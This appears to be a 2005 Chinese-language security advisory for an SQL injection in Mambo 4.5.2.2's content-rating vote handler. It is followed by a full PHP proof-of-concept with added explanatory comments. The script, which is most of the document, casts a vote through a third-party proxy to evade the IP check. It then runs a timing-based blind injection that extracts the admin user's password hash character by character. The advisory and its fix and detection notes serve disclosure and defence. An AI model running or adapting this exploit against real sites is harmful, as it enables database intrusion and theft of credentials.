发布日期:2005-06-16更新日期:2005-06-16受影响系统:
Mambo Mambo Open Source <= 4.5.2.2不受影响系统:
Mambo Mambo Open Source 4.5.2.3描述:
BUGTRAQ ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_content中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。 -- content.php -- 100 case 'vote': 101 recordVote ( $url , $user_rating , $cid , $database); 102 break; ... 1478 $query = "UPDATE #__content_rating" 1479 . "\n SET rating_count = rating_count + 1," 1450 . "\n rating_sum = rating_sum + $user_rating," 1451 . "\n lastip = '$currip'" 1452 . "\n WHERE content_id = ". $cid 1453 ; ----------------在1450行,$user_rating未经任何验证便被直接拼接进SQL语句,导致攻击者可以获得敏感信息。测试方法:
Warning: the following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!*//* Review notes (added): this is the advisory's 2005 proof-of-concept exactly as pasted on the page, a line-collapsed listing; the wrapping artifacts ("op \tion", "Itemid \=1", "$ \benchcount", "\CURLOPT_RETURNTRANSFER") and the end-of-line "//" comments are left untouched, only comments are added. It demonstrates why the unvalidated $user_rating in content.php (advisory line 1450) matters: the parameter is interpolated straight into the UPDATE string, so attacker-controlled SQL runs against the database. Server-side fix: validate/cast user_rating to an integer (or bind it) before it reaches the query; the advisory lists Mambo 4.5.2.3 as unaffected. Detection: vote requests (index.php?option=com_content&task=vote) whose user_rating carries SQL text such as "benchmark(" or "select", and such requests taking markedly longer than ordinary page loads. */if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57, 97,98,99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122 ); if($argv[1]){ $url = $argv[1]; if ($argv[2]) $aid = $argv[2]; if ($argv[3]) $benchcount = $argv[3]; if ($argv[4]) $proxy = $argv[4]; }else { echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n"; echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n"; echo "\taid\t userid to get (default: 62 (admin))\n"; echo "\tbenchmarkcount\t benchmark count (default: 150000)\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit;}/* A vote is first cast through a third-party web proxy, presumably so it arrives from a different client IP (the advisory's UPDATE records lastip) — TODO confirm against Mambo's vote handling. */// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);/* Baseline: time an ordinary page load ($sloadtime) for later comparison. */// standard page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; /* Calibration: the injected user_rating makes the server evaluate benchmark() inside the UPDATE, so a response slower than the baseline shows the injected SQL executes (a timing oracle). */// benchmark page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = 
floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; /* A "DB function failed" page means the subquery was rejected; the script attributes this to MySQL < 4.1. A calibration time within 2 s of the baseline is treated as an unusable oracle. */// check if SQL query failedif (ereg("DB function failed",$res)){ echo "[x] mysql < 4.1 detected - not exploitable\n"; exit();}if ($bloadtime <= $sloadtime + 2){ echo "[x] increase your benchmark count\n"; exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";/* Extraction loop: 32 positions (1..32), each probed one charmap byte at a time by comparing $xloadtime with $bloadtime; a slower response selects the byte and moves on. The bail-out at $char == 103 ('g') suggests the author expected a hexadecimal digest (0-9, a-f), treating a miss past 'f' as "not vulnerable". NOTE(review): $hash is accumulated but never printed; the visible result is whatever the per-character echo/backspace sequence leaves on the terminal. */// starting fetch password$benchcount = $benchcount*2; for($i= 1;$i< 33;$i++){ foreach ($charmap as $char){ $start = time(); echo chr($char); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $stop = time(); $xloadtime = floatval($stop - $start); if (floatval($xloadtime) > $bloadtime){ $hash .= chr($char); break 1; } else { echo chr(8); } if ($char == 103){ echo "\n\n\tNot Vulnerable or Something wrong occur ...\n"; exit; } }}echo "\n";?>建议:
厂商补丁:Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.gz